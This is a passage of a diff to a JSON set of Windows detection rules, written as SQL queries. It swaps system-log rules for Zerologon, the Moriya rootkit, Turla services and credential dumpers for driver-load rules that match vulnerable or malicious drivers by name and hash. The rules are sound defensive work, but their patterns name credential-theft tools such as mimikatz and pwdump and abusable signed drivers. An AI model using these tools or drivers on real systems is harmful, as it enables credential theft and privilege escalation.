'9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE 